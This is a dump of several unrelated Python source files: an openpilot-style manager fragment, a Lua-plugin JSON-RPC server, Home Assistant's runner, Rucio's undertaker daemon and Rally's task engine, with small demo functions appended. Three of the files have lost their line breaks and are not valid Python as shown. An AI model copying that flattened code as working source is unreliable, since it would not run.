params.get("Passive") is None: raise Exception("Passive must be set to continue") if ANDROID: update_apks() manager_init() manager_prepare(spinner) spinner.close() if os.getenv("PREPAREONLY") is not None: return # SystemExit on sigterm signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1)) try: manager_thread() except Exception: traceback.print_exc() crash.capture_exception() finally: cleanup_all_processes(None, None) if params.get("DoUninstall", encoding='utf8') == "1": uninstall() if __name__ == "__main__": try: main() except Exception: add_logentries_handler(cloudlog) cloudlog.exception("Manager failed to start") # Show last 3 lines of traceback error = traceback.format_exc(-3) error = "Manager failed to start\n \n" + error with TextWindow(error) as t: t.wait_for_exit() raise # manual exit because we are forked sys.exit(0)
main.py
#!/usr/bin/env python2
# Asynchronous RPC server over STDIO
from __future__ import print_function

import sys
import time
import pyjsonrpc
import threading
import Queue
import signal
import json
import base64

# --- Lua help text ---

# Help for the functions that are made available to Lua
luahelp = """
add3(number, number) -> number // Adds two numbers and then the number 3
"""

# --- Lua code ---

# $0 is replaced with the path to the plugin, when sending this code to the server
luacode = """
function add3(a, b)
  return CallPlugin("$0", "Add3", a, b)
end
"""

# --- RPC classes and functions ---


def log(*objs):
    """Warning log function that prints to stderr"""
    print("[plugin log]", *objs, file=sys.stderr)


class EncDec:
    """Decorator for decoding and encoding the arguments and return values"""

    def __init__(self, f):
        self.f = f

    def __call__(self, *args, **kwargs):
        a = json.loads(base64.decodestring(args[0]))
        return base64.encodestring(json.dumps(self.f(self, *a)))


class JsonRpc(pyjsonrpc.JsonRpc):
    """Only uppercase methods are made available under the Lua namespace"""

    # Remember to decorate with @EncDec if needed, to enc/dec to base64 and JSON

    @pyjsonrpc.rpcmethod
    @EncDec
    def Add3(self, a, b):
        """Add two numbers and then 3"""
        return a + b + 3

    @pyjsonrpc.rpcmethod
    def Code(self, pluginPath):
        """Return the Lua code for this plugin, as JSON"""
        return luacode.replace("$0", pluginPath)

    @pyjsonrpc.rpcmethod
    def Help(self, args):
        """Return the Lua help for this plugin, as JSON"""
        return luahelp


# --- Common functions ---

queue = Queue.Queue()


def worker(line, q, rpc_client):
    """Worker thread that handles the RPC server calls for us when requests come in via stdin"""
    out = rpc_client.call(line)
    q.put(out)
    return


def printer(q):
    """Output handler: the printer thread polls the results queue and outputs results as they appear."""
    # log("Printer started")
    while True:
        out = q.get()
        if out == "kill":
            # log("Kill signal received, stopping threads")
            return
        sys.stdout.write(out + "\n")
        sys.stdout.flush()


printer_thread = threading.Thread(target=printer, args=[queue])


def init():
    """Initialise the printer thread and exit signal handler so that we kill long running threads on exit"""
    printer_thread.start()

    def signal_handler(signal, frame):
        queue.put("kill")
        printer_thread.join()
        # sys.exit(0)

    signal.signal(signal.SIGINT, signal_handler)
    return


def main():
    init()
    rpc = JsonRpc()

    # Build the Lua RPC namespace for methods that start with an uppercase letter
    for name in dir(rpc):
        if name[0].isupper():
            setattr(rpc, "Lua." + name, getattr(rpc, name, None))

    line = sys.stdin.readline()
    # The handling of lines is asynchronous,
    # so that out-of-order requests can be handled
    while line:
        try:
            t = threading.Thread(target=worker, args=[line, queue, rpc])
            t.start()
            line = sys.stdin.readline()
        except Exception as e:
            log("Exception occurred: ", e)
            queue.put("kill")
            printer_thread.join()


if __name__ == "__main__":
    main()
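
# --- Illustrative sketch, not called at runtime: the wire format handled by
# the EncDec decorator above. Arguments arrive as a base64-encoded JSON list
# and return values go back the same way; this round-trips a call to Add3 by
# hand, using only modules this file already imports.
def _demo_encdec_roundtrip():
    request = base64.encodestring(json.dumps([2, 5]))
    a, b = json.loads(base64.decodestring(request))
    response = base64.encodestring(json.dumps(a + b + 3))
    return json.loads(base64.decodestring(response))  # -> 10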
runner.py
"""Run Home Assistant.""" import asyncio from concurrent.futures import ThreadPoolExecutor import dataclasses import logging import sys import threading from typing import Any, Dict, Optional from homeassistant import bootstrap from homeassistant.core import callback from homeassistant.helpers.frame import warn_use # # Python 3.8 has significantly less workers by default # than Python 3.7. In order to be consistent between # supported versions, we need to set max_workers. # # In most cases the workers are not I/O bound, as they # are sleeping/blocking waiting for data from integrations # updating so this number should be higher than the default # use case. # MAX_EXECUTOR_WORKERS = 64 @dataclasses.dataclass class RuntimeConfig: """Class to hold the information for running Home Assistant.""" config_dir: str skip_pip: bool = False safe_mode: bool = False verbose: bool = False log_rotate_days: Optional[int] = None log_file: Optional[str] = None log_no_color: bool = False debug: bool = False open_ui: bool = False # In Python 3.8+ proactor policy is the default on Windows if sys.platform == "win32" and sys.version_info[:2] < (3, 8): PolicyBase = asyncio.WindowsProactorEventLoopPolicy else: PolicyBase = asyncio.DefaultEventLoopPolicy class HassEventLoopPolicy(PolicyBase): # type: ignore """Event loop policy for Home Assistant.""" def __init__(self, debug: bool) -> None: """Init the event loop policy.""" super().__init__() self.debug = debug @property def loop_name(self) -> str: """Return name of the loop.""" return self._loop_factory.__name__ # type: ignore def new_event_loop(self) -> asyncio.AbstractEventLoop: """Get the event loop.""" loop: asyncio.AbstractEventLoop = super().new_event_loop() loop.set_exception_handler(_async_loop_exception_handler) if self.debug: loop.set_debug(True) executor = ThreadPoolExecutor( thread_name_prefix="SyncWorker", max_workers=MAX_EXECUTOR_WORKERS ) loop.set_default_executor(executor) loop.set_default_executor = warn_use( # type: ignore loop.set_default_executor, "sets default executor on the event loop" ) # Python 3.9+ if hasattr(loop, "shutdown_default_executor"): return loop # Copied from Python 3.9 source def _do_shutdown(future: asyncio.Future) -> None: try: executor.shutdown(wait=True) loop.call_soon_threadsafe(future.set_result, None) except Exception as ex: # pylint: disable=broad-except loop.call_soon_threadsafe(future.set_exception, ex) async def shutdown_default_executor() -> None: """Schedule the shutdown of the default executor.""" future = loop.create_future() thread = threading.Thread(target=_do_shutdown, args=(future,)) thread.start() try: await future finally: thread.join() setattr(loop, "shutdown_default_executor", shutdown_default_executor) return loop @callback def _async_loop_exception_handler(_: Any, context: Dict) -> None: """Handle all exception inside the core loop.""" kwargs = {} exception = context.get("exception") if exception: kwargs["exc_info"] = (type(exception), exception, exception.__traceback__) logging.getLogger(__package__).error( "Error doing job: %s", context["message"], **kwargs # type: ignore ) async def setup_and_run_hass(runtime_config: RuntimeConfig) -> int: """Set up Home Assistant and run.""" hass = await bootstrap.async_setup_hass(runtime_config) if hass is None: return 1 return await hass.async_run() def run(runtime_config: RuntimeConfig) -> int: """Run Home Assistant.""" asyncio.set_event_loop_policy(HassEventLoopPolicy(runtime_config.debug)) return asyncio.run(setup_and_run_hass(runtime_config))
undertaker.py
# -*- coding: utf-8 -*-
# Copyright 2013-2020 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2013-2018
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2015
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2019
# - Mario Lassnig <mario.lassnig@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020

'''
Undertaker is a daemon to manage expired DIDs.
'''

import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from random import randint
from re import match

from sqlalchemy.exc import DatabaseError

import rucio.db.sqla.util
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound
from rucio.common.types import InternalAccount
from rucio.common.utils import chunks
from rucio.core.did import list_expired_dids, delete_dids
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.monitor import record_counter

logging.getLogger("requests").setLevel(logging.CRITICAL)

logging.basicConfig(stream=sys.stdout,
                    level=getattr(logging,
                                  config_get('common', 'loglevel',
                                             raise_exception=False,
                                             default='DEBUG').upper()),
                    format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')

GRACEFUL_STOP = threading.Event()


def undertaker(worker_number=1, total_workers=1, chunk_size=5, once=False):
    """
    Main loop to select and delete DIDs.
    """
    logging.info('Undertaker(%s): starting', worker_number)
    logging.info('Undertaker(%s): started', worker_number)
    executable = 'undertaker'
    hostname = socket.gethostname()
    pid = os.getpid()
    thread = threading.current_thread()
    sanity_check(executable=executable, hostname=hostname)

    paused_dids = {}  # {(scope, name): datetime}

    while not GRACEFUL_STOP.is_set():
        try:
            heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, older_than=6000)
            logging.info('Undertaker({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))

            # Refresh paused dids
            iter_paused_dids = deepcopy(paused_dids)
            for key in iter_paused_dids:
                if datetime.utcnow() > paused_dids[key]:
                    del paused_dids[key]

            dids = list_expired_dids(worker_number=heartbeat['assign_thread'], total_workers=heartbeat['nr_threads'], limit=10000)

            dids = [did for did in dids if (did['scope'], did['name']) not in paused_dids]

            if not dids and not once:
                logging.info('Undertaker(%s): Nothing to do. Sleeping 60 seconds.', worker_number)
                time.sleep(60)
                continue

            for chunk in chunks(dids, chunk_size):
                try:
                    logging.info('Undertaker(%s): Received %s dids to delete', worker_number, len(chunk))
                    delete_dids(dids=chunk, account=InternalAccount('root', vo='def'), expire_rules=True)
                    logging.info('Undertaker(%s): Deleted %s dids', worker_number, len(chunk))
                    record_counter(counters='undertaker.delete_dids', delta=len(chunk))
                except RuleNotFound as error:
                    logging.error(error)
                except (DatabaseException, DatabaseError, UnsupportedOperation) as e:
                    if match('.*ORA-00054.*', str(e.args[0])) or match('.*55P03.*', str(e.args[0])) or match('.*3572.*', str(e.args[0])):
                        for did in chunk:
                            paused_dids[(did['scope'], did['name'])] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
                        record_counter('undertaker.delete_dids.exceptions.LocksDetected')
                        logging.warning('undertaker[%s/%s]: Locks detected for chunk', heartbeat['assign_thread'], heartbeat['nr_threads'])
                    else:
                        logging.error('Undertaker(%s): Got database error %s.', worker_number, str(e))
        except:
            logging.critical(traceback.format_exc())
            time.sleep(1)

        if once:
            break

    die(executable=executable, hostname=hostname, pid=pid, thread=thread)
    logging.info('Undertaker(%s): graceful stop requested', worker_number)
    logging.info('Undertaker(%s): graceful stop done', worker_number)


def stop(signum=None, frame=None):
    """
    Graceful exit.
    """
    GRACEFUL_STOP.set()


def run(once=False, total_workers=1, chunk_size=10):
    """
    Starts up the undertaker threads.
    """
    if rucio.db.sqla.util.is_old_db():
        raise DatabaseException('Database was not updated, daemon won\'t start')

    logging.info('main: starting threads')
    threads = [threading.Thread(target=undertaker, kwargs={'worker_number': i,
                                                           'total_workers': total_workers,
                                                           'once': once,
                                                           'chunk_size': chunk_size}) for i in range(0, total_workers)]
    [t.start() for t in threads]
    logging.info('main: waiting for interrupts')
    # Interruptible joins require a timeout.
    while threads[0].is_alive():
        [t.join(timeout=3.14) for t in threads]
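
# --- Illustrative sketch, not used by the daemon: the pause/backoff
# bookkeeping applied above when delete_dids() hits lock contention. Each
# affected DID is paused until a random moment 600-2400 s in the future and
# filtered out of the work list until then; uses only names already
# imported in this module. The scope/name values are made up.
def _demo_paused_dids():
    paused = {('mock_scope', 'dataset_a'): datetime.utcnow() + timedelta(seconds=randint(600, 2400))}
    dids = [{'scope': 'mock_scope', 'name': 'dataset_a'},
            {'scope': 'mock_scope', 'name': 'dataset_b'}]
    # expired pauses are dropped; active ones filter the candidate list
    paused = {k: v for k, v in paused.items() if v > datetime.utcnow()}
    return [did for did in dids if (did['scope'], did['name']) not in paused]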
engine.py
# Copyright 2013: Mirantis Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import json import threading import time import traceback from rally.common import cfg from rally.common import logging from rally.common import objects from rally import consts from rally import exceptions from rally.task import context from rally.task import hook from rally.task import runner from rally.task import scenario from rally.task import sla from rally.utils import strutils LOG = logging.getLogger(__name__) CONF = cfg.CONF TASK_ENGINE_OPTS = [ cfg.IntOpt("raw_result_chunk_size", default=1000, min=1, help="Size of raw result chunk in iterations"), ] class ResultConsumer(object): """ResultConsumer class stores results from ScenarioRunner, checks SLA. Also ResultConsumer listens for runner events and notifies HookExecutor about started iterations. """ def __init__(self, workload_cfg, task, subtask, workload, runner, abort_on_sla_failure, ctx_manager): """ResultConsumer constructor. :param workload_cfg: A configuration of the Workload :param task: Instance of Task, task to run :param subtask: Instance of Subtask :param workload: Instance of Workload :param runner: ScenarioRunner instance that produces results to be consumed :param abort_on_sla_failure: True if the execution should be stopped when some SLA check fails :param ctx_manager: ContextManager instance """ self.task = task self.subtask = subtask self.workload = workload self.workload_cfg = workload_cfg self.runner = runner self.load_started_at = float("inf") self.load_finished_at = 0 self.workload_data_count = 0 self.sla_checker = sla.SLAChecker(self.workload_cfg) self.hook_executor = hook.HookExecutor(self.workload_cfg, self.task) self.abort_on_sla_failure = abort_on_sla_failure self.is_done = threading.Event() self.unexpected_failure = {} self.results = [] self.thread = threading.Thread(target=self._consume_results) self.aborting_checker = threading.Thread(target=self.wait_and_abort) if self.workload_cfg["hooks"]: self.event_thread = threading.Thread(target=self._consume_events) self._cm = ctx_manager def __enter__(self): self.thread.start() self.aborting_checker.start() if self.workload_cfg["hooks"]: self.event_thread.start() self.start = time.time() return self def _consume_results(self): task_aborted = False while True: if self.runner.result_queue: results = self.runner.result_queue.popleft() self.results.extend(results) for r in results: self.load_started_at = min(r["timestamp"], self.load_started_at) self.load_finished_at = max(r["duration"] + r["timestamp"], self.load_finished_at) success = self.sla_checker.add_iteration(r) if (self.abort_on_sla_failure and not success and not task_aborted): self.sla_checker.set_aborted_on_sla() self.runner.abort() self.task.update_status( consts.TaskStatus.SOFT_ABORTING) task_aborted = True # save results chunks chunk_size = CONF.raw_result_chunk_size while len(self.results) >= chunk_size: results_chunk = self.results[:chunk_size] self.results = self.results[chunk_size:] 
results_chunk.sort(key=lambda x: x["timestamp"]) self.workload.add_workload_data(self.workload_data_count, {"raw": results_chunk}) self.workload_data_count += 1 elif self.is_done.isSet(): break else: time.sleep(0.1) def _consume_events(self): while not self.is_done.isSet() or self.runner.event_queue: if self.runner.event_queue: event = self.runner.event_queue.popleft() self.hook_executor.on_event( event_type=event["type"], value=event["value"]) else: time.sleep(0.01) def __exit__(self, exc_type, exc_value, exc_traceback): self.finish = time.time() self.is_done.set() self.aborting_checker.join() self.thread.join() if exc_type: self.sla_checker.set_unexpected_failure(exc_value) if objects.Task.get_status( self.task["uuid"]) == consts.TaskStatus.ABORTED: self.sla_checker.set_aborted_manually() load_duration = max(self.load_finished_at - self.load_started_at, 0) LOG.info("Load duration is: %s" % strutils.format_float_to_str( load_duration)) LOG.info("Full runner duration is: %s" % strutils.format_float_to_str(self.runner.run_duration)) LOG.info("Full duration is: %s" % strutils.format_float_to_str( self.finish - self.start)) results = {} if self.workload_cfg["hooks"]: self.event_thread.join() results["hooks_results"] = self.hook_executor.results() if self.results: # NOTE(boris-42): Sort in order of starting # instead of order of ending self.results.sort(key=lambda x: x["timestamp"]) self.workload.add_workload_data(self.workload_data_count, {"raw": self.results}) start_time = (self.load_started_at if self.load_started_at != float("inf") else None) self.workload.set_results(load_duration=load_duration, full_duration=(self.finish - self.start), sla_results=self.sla_checker.results(), start_time=start_time, contexts_results=self._cm.contexts_results(), **results) @staticmethod def is_task_in_aborting_status(task_uuid, check_soft=True): """Checks task is in abort stages :param task_uuid: UUID of task to check status :type task_uuid: str :param check_soft: check or not SOFT_ABORTING status :type check_soft: bool """ stages = [consts.TaskStatus.ABORTING, consts.TaskStatus.ABORTED] if check_soft: stages.append(consts.TaskStatus.SOFT_ABORTING) return objects.Task.get_status(task_uuid) in stages def wait_and_abort(self): """Waits until abort signal is received and aborts runner in this case. Has to be run from different thread simultaneously with the runner.run method. """ while not self.is_done.isSet(): if self.is_task_in_aborting_status(self.task["uuid"], check_soft=False): self.runner.abort() self.task.update_status(consts.TaskStatus.ABORTED) break time.sleep(2.0) class TaskAborted(Exception): """Task aborted exception Used by TaskEngine to interrupt task run. """ class TaskEngine(object): """The Task engine class is used to execute benchmark scenarios. An instance of this class is initialized by the API with the task configuration and then is used to validate and execute all specified in config subtasks. .. note:: Typical usage: ... engine = TaskEngine(config, task, env) engine.validate() # to test config engine.run() # to run config """ def __init__(self, config, task, env, abort_on_sla_failure=False): """TaskEngine constructor. 
:param config: An instance of a rally.task.config.TaskConfig :param task: Instance of Task, the current task which is being performed :param env: Instance of Environment, :param abort_on_sla_failure: True if the execution should be stopped when some SLA check fails """ self.config = config self.task = task self.env = env self.abort_on_sla_failure = abort_on_sla_failure def _validate_workload(self, workload, vcontext=None, vtype=None): """Validate a workload. :param workload: a workload configuration :param vcontext: a validation context :param vtype: a type of validation (platform, syntax or semantic) """ try: scenario_cls = scenario.Scenario.get(workload["name"]) except exceptions.PluginNotFound as e: raise exceptions.InvalidTaskConfig( name=workload["name"], pos=workload["position"], config=json.dumps(objects.Workload.to_task(workload)), reason=e.format_message()) scenario_context = copy.deepcopy(scenario_cls.get_default_context()) results = [] results.extend(scenario.Scenario.validate( name=workload["name"], context=vcontext, config=workload, plugin_cfg=None, vtype=vtype)) if workload["runner_type"]: results.extend(runner.ScenarioRunner.validate( name=workload["runner_type"], context=vcontext, config=None, plugin_cfg=workload["runner"], vtype=vtype)) for context_name, context_conf in workload["contexts"].items(): results.extend(context.Context.validate( name=context_name, context=vcontext, config=None, plugin_cfg=context_conf, vtype=vtype)) for context_name, context_conf in scenario_context.items(): results.extend(context.Context.validate( name=context_name, context=vcontext, config=None, plugin_cfg=context_conf, allow_hidden=True, vtype=vtype)) for sla_name, sla_conf in workload["sla"].items(): results.extend(sla.SLA.validate( name=sla_name, context=vcontext, config=None, plugin_cfg=sla_conf, vtype=vtype)) for hook_conf in workload["hooks"]: action_name, action_cfg = hook_conf["action"] results.extend(hook.HookAction.validate( name=action_name, context=vcontext, config=None, plugin_cfg=action_cfg, vtype=vtype)) trigger_name, trigger_cfg = hook_conf["trigger"] results.extend(hook.HookTrigger.validate( name=trigger_name, context=vcontext, config=None, plugin_cfg=trigger_cfg, vtype=vtype)) if results: raise exceptions.InvalidTaskConfig( name=workload["name"], pos=workload["position"], config=json.dumps(objects.Workload.to_task(workload)), reason="\n ".join(results)) @logging.log_task_wrapper(LOG.info, "Task validation of syntax.") def _validate_config_syntax(self, config): for subtask in config.subtasks: for workload in subtask["workloads"]: self._validate_workload(workload, vtype="syntax") @logging.log_task_wrapper(LOG.info, "Task validation of required platforms.") def _validate_config_platforms(self, config): # FIXME(andreykurilin): prepare the similar context object to others platforms = dict( (p["platform_name"], p["platform_data"]) for p in self.env.data["platforms"].values()) ctx = {"task": self.task, "platforms": platforms} for subtask in config.subtasks: for workload in subtask["workloads"]: self._validate_workload( workload, vcontext=ctx, vtype="platform") @logging.log_task_wrapper(LOG.info, "Task validation of semantic.") def _validate_config_semantic(self, config): LOG.info("Check health of the environment '%s'." 
% self.env.uuid) failed = [] for p, res in self.env.check_health().items(): LOG.info("Platform %s (available: %s): %s" % (p, res["available"], res["message"])) if not res["available"]: failed.append(p) if logging.is_debug(): LOG.error(res["traceback"]) if failed: raise exceptions.ValidationError( "One or several platforms are not available: %s. Check logs " "for more details." % ", ".join(failed)) validation_ctx = self.env.get_validation_context() env_data = self.env.data env_data["platforms"] = dict( (p["platform_name"], p["platform_data"]) for p in env_data["platforms"].values()) ctx_obj = {"task": self.task, "config": validation_ctx, "env": env_data} with context.ContextManager(ctx_obj): for subtask in config.subtasks: for workload in subtask["workloads"]: self._validate_workload( workload, vcontext=ctx_obj, vtype="semantic") @logging.log_task_wrapper(LOG.info, "Task validation.") def validate(self, only_syntax=False): """Perform full task configuration validation. :param only_syntax: Check only syntax of task configuration """ self.task.update_status(consts.TaskStatus.VALIDATING) try: self._validate_config_syntax(self.config) if only_syntax: return self._validate_config_platforms(self.config) self._validate_config_semantic(self.config) except Exception as e: exception_info = json.dumps(traceback.format_exc(), indent=2, separators=(",", ": ")) self.task.set_failed(type(e).__name__, str(e), exception_info) expected_errors = ( # this error is a wrapper for all error messages from # validators. exceptions.InvalidTaskConfig, # rally.task.task_cfg raises it # _validate_config_semantic raises this error in case of # failed platform check{s} exceptions.ValidationError) if logging.is_debug() and not isinstance(e, expected_errors): LOG.exception("Unexpected error had happened while validating " "task.") raise def _prepare_context(self, ctx, scenario_name, owner_id): context_config = {} # restore full names of plugins scenario_plugin = scenario.Scenario.get(scenario_name) for k, v in scenario_plugin.get_default_context().items(): c = context.Context.get(k, allow_hidden=True) context_config[c.get_fullname()] = v for k, v in ctx.items(): context_config[context.Context.get(k).get_fullname()] = v env_data = self.env.data env_data["platforms"] = dict( (p["platform_name"], p["platform_data"]) for p in env_data["platforms"].values()) context_obj = { "task": self.task, "owner_id": owner_id, "scenario_name": scenario_name, "config": context_config, "env": env_data } return context_obj @logging.log_task_wrapper(LOG.info, "Running task.") def run(self): """Run the benchmark according to the test configuration. Test configuration is specified on engine initialization. 
:returns: List of dicts, each dict containing the results of all the corresponding benchmark test launches """ self.task.update_status(consts.TaskStatus.RUNNING) try: for subtask in self.config.subtasks: self._run_subtask(subtask) except TaskAborted: LOG.info("Received aborting signal.") self.task.update_status(consts.TaskStatus.ABORTED) else: if objects.Task.get_status( self.task["uuid"]) != consts.TaskStatus.ABORTED: self.task.update_status(consts.TaskStatus.FINISHED) def _run_subtask(self, subtask): subtask_obj = self.task.add_subtask(title=subtask["title"], description=subtask["description"], contexts=subtask["contexts"]) try: # TODO(astudenov): add subtask context here for workload in subtask["workloads"]: self._run_workload(subtask_obj, workload) except TaskAborted: subtask_obj.update_status(consts.SubtaskStatus.ABORTED) raise except Exception: subtask_obj.update_status(consts.SubtaskStatus.CRASHED) # TODO(astudenov): save error to DB LOG.exception("Unexpected exception during the subtask execution") # NOTE(astudenov): crash task after exception in subtask self.task.update_status(consts.TaskStatus.CRASHED) raise else: subtask_obj.update_status(consts.SubtaskStatus.FINISHED) def _run_workload(self, subtask_obj, workload): if ResultConsumer.is_task_in_aborting_status(self.task["uuid"]): raise TaskAborted() workload_obj = subtask_obj.add_workload( name=workload["name"], description=workload["description"], position=workload["position"], runner=workload["runner"], runner_type=workload["runner_type"], hooks=workload["hooks"], contexts=workload["contexts"], sla=workload["sla"], args=workload["args"]) workload["uuid"] = workload_obj["uuid"] workload_cfg = objects.Workload.to_task(workload) LOG.info("Running workload: \n" " position = %(position)s\n" " config = %(cfg)s" % {"position": workload["position"], "cfg": json.dumps(workload_cfg, indent=3)}) runner_cls = runner.ScenarioRunner.get(workload["runner_type"]) runner_obj = runner_cls(self.task, workload["runner"]) context_obj = self._prepare_context( workload["contexts"], workload["name"], workload_obj["uuid"]) try: ctx_manager = context.ContextManager(context_obj) with ResultConsumer(workload, task=self.task, subtask=subtask_obj, workload=workload_obj, runner=runner_obj, abort_on_sla_failure=self.abort_on_sla_failure, ctx_manager=ctx_manager): with ctx_manager: runner_obj.run(workload["name"], context_obj, workload["args"]) except Exception: LOG.exception("Unexpected exception during the workload execution") # TODO(astudenov): save error to DB
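
# --- Illustrative sketch, not part of the engine: the fixed-size,
# timestamp-sorted chunking that ResultConsumer._consume_results applies to
# raw iteration results before handing them to the workload (the chunk size
# there is CONF.raw_result_chunk_size; 3 here is just for the demo).
def _demo_result_chunking(results, chunk_size=3):
    flushed = []
    while len(results) >= chunk_size:
        chunk, results = results[:chunk_size], results[chunk_size:]
        chunk.sort(key=lambda r: r["timestamp"])
        flushed.append(chunk)
    return flushed, results  # completed chunks, remaining buffer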